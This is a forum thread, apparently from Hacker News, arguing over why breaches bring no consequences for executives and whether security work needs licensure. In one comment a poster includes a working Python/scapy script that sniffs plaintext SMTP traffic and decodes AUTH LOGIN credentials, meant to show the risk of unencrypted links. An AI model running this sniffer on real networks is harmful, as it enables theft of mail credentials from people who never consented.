Comment by ryandrake
1 day ago
Likely there are no consequences for the decision-makers when data exfiltration or other shenanigans happen, so there's nothing motivating a behavior change.
The reason security is so bad everywhere is that nobody gets fired when there's a breach. It's just blamed on the hackers and everyone just goes on with life singing "We take security very seriously--this happened because of someone else!"
Who do you imagine will get fired? The CISO who's been recommending various security improvements and trying to get them implemented, but has been unable to due to a lack of C-level interest in IT? Or the C-levels who lack interest in IT security until it bites them in the investor?
At least here in the EU we're moving toward personal responsibility for C-levels who don't take IT and OT security seriously in critical sectors, and in my anecdotal experience that's the first time anything regarding security has actually made decision-makers take it seriously. A lot of it is still just bureaucracy, though. We have a DORA- and NIS2-compliant piece of OT that is technically completely insecure, but it's compliant because we've written a detailed plan on how to make it secure.
Who currently gets fired for engineering malpractice? It would be the same if there were actual certifications and engineering sign-offs in cybersecurity and other critical areas of development.
I won't pretend that accountability in the physical engineering world is all smiles and rainbows, but at least there are actual laws dictating responsibilities, certification, and other real consequences for civil engineers. When a Professional Engineer in Canada signs off on (seals) work, they are legally assuming responsibility, which means the practitioner can be held accountable in the event of professional misconduct or incompetence regarding that work. There is no reason but corporate greed and corruption why there isn't similar legislation in North America for cybersecurity or software engineering, where professional bodies certify people who are legally obligated to sign off on work (and to refuse work that isn't up to standard).
But this would require introducing actual legislation, and god forbid we do such a thing to the poor market! It would stifle their innovation at leaking everyone's data.
There's no reason we couldn't extend the existing system of licensure [1] that professional engineers already operate under.
Sure, maybe it's overkill for someone stringing together a Python app, but if you're engineering the handling of any actual personal information, that work ought to be overseen by qualified, licensed, and accountable professionals who are backed by actual laws.
[1] https://en.wikipedia.org/w/index.php?title=Regulation_and_li...
> nobody gets fired when there's a breach
This must mean the consequences of such a breach have either not produced any visible damage, or the entity being damaged is uncaring (or has no power to care).
If you fire people for stuff they didn't maliciously introduce, you will end up with no people to work with.
Imagine jailing doctors for every patient that died; you would be out of doctors quite soon.
The legal system already has a sufficient standard for this: you're only on the hook for things you should have been aware of, or would have been informed about.
E.g., doctors do get sued and fired for malpractice if they did something no other skilled doctor would reasonably do ("let's just reuse the instruments from the previous surgery").
If the doctor is criminally negligent they could be jailed.
We don't get 18-year-olds in perfect health delivered to us, and a lot of Americans don't believe in wellness visits. Although, more and more, it's the insurance companies that are practicing medicine. Sorry, it's a sore subject with me lol
> this must mean the consequences of such a breach have either not produced any visible damage
Yeah, let's say you were carrying unencrypted frames for Bill's Burger Hut.
The largest extent of the damage might be someone sniffing SMTP credentials or something (see the sketch at the end of this comment). Spam gets sent from Bill's account; he never figures out how it was done, but his IP reputation is permanently in the toilet.
Let's then say that instead of Bill's Burger Hut, you are carrying traffic for critical mineral and food industries, and the attacker isn't a scammer but a hostile nation state. The customer never realises, but there's a large, long-term financial cost because (TOTALLY NOT CHINA) is sharing this data with competitors of yours overseas, or preparing to drop your pants in a huge way for foreign policy reasons.
No one gets fired until after the worst-case long-term damage, and even then probably not.
In fact, the likely outcome is that the burden of L2 encryption gets moved onto the customer and the cowboy never changes.
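To make the sniffing part concrete, here's a minimal sketch of what lifting plaintext SMTP credentials off unencrypted frames can look like. Illustrative only: it assumes scapy is installed, that you have capture privileges on the link, and that the mail session uses AUTH LOGIN on port 25 without STARTTLS.

    # Illustrative sketch: pull base64 lines (how AUTH LOGIN sends the
    # username and password) out of plaintext SMTP traffic.
    # Assumes scapy is installed and you can capture on the link
    # (root / CAP_NET_RAW). Expect false positives; it's a sketch.
    import base64
    from scapy.all import TCP, Raw, sniff

    def check_smtp(pkt):
        if not (pkt.haslayer(TCP) and pkt.haslayer(Raw)):
            return
        for line in bytes(pkt[Raw].load).splitlines():
            try:
                decoded = base64.b64decode(line, validate=True)
            except Exception:
                continue  # not a base64 line; skip it
            if decoded and decoded.isascii():
                print(f"possible credential material: {decoded!r}")

    # Port 25 without STARTTLS is exactly the "unencrypted frames" case.
    sniff(filter="tcp port 25", prn=check_smtp, store=False)

Anyone positioned on the path can do this passively, which is why the "fix" that gets pushed onto the customer is encrypting at L2 (e.g. MACsec) or tunnelling over the link, taking the carrier's plaintext frames out of the equation entirely.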
End-user license agreements are a huge part of the problem. Ideally, users could sue if their data is leaked, and the threat of being sued would put pressure on companies to take security more seriously. I.e., it would become a business concern.
Instead, we're constantly asked to sign one-sided contracts ("EULAs") which forbid us from suing. If a company's incompetence results in my data being leaked on the internet, there are no consequences. And there's not a thing any of us can do about it.
There is in at least California, the EU, and China: a lot of clauses in EULAs aren't actually enforceable.
Or the entity being damaged is not the decision-maker and has no power to hold the decision-maker responsible.
Or the damage is diffuse whereas the costs of preventing the breach would be concentrated. Or the connection between the damage and the breach is difficult to prove.
That and H-1B abuse.